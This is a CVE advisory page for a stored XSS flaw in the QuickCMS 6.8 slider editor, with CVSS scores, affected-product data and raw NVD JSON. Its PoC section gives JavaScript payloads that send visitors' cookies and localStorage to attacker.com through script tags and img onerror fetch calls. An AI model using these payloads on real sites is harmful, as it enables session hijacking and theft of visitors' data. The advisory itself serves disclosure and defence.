Security Vulnerability Report
中文
CVE-2025-9981 CVSS 4.8 MEDIUM

CVE-2025-9981

Published: 2025-10-23 10:15:33
Last Modified: 2025-11-17 15:57:34
Source: [email protected]

Description

QuickCMS is vulnerable to multiple Stored XSS in slider editor functionality (sliders-form). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed on every page. By default admin user is not able to add JavaScript into the website. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:* - VULNERABLE
QuickCMS 6.8(已确认受影响)
QuickCMS 其他版本(可能受影响,未经测试)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-9981 PoC - Stored XSS in QuickCMS Slider Editor // Target: QuickCMS <= 6.8 sliders-form endpoint // Step 1: Authenticate as admin const loginEndpoint = 'http://target.com/admin/login.php'; const credentials = { username: 'admin', password: 'admin123' }; // Step 2: Inject XSS payload via slider editor const xssPayload = '<script>document.location="https://attacker.com/steal?cookie="+document.cookie</script>'; const sliderFormEndpoint = 'http://target.com/admin/sliders-form.php'; const maliciousSlider = { name: 'Malicious Slider', description: xssPayload, // XSS payload injection point content: '<img src=x onerror="fetch(\'https://attacker.com/log?c=\'+document.cookie)">' }; // Step 3: Submit the malicious slider // POST request to sliders-form.php with crafted parameters // Payload will be stored and executed on all pages displaying the slider // Alternative payload for stealing admin session: const sessionHijackPayload = ` <img src=x onerror=" fetch('https://attacker.com/api/log', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, localStorage: localStorage, url: window.location.href }) }) "> `;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9981", "sourceIdentifier": "[email protected]", "published": "2025-10-23T10:15:32.743", "lastModified": "2025-11-17T15:57:33.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QuickCMS is vulnerable to multiple Stored XSS in slider editor functionality (sliders-form). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed on every page. By default admin user is not able to add JavaScript into the website.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/10/CVE-2025-9980", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.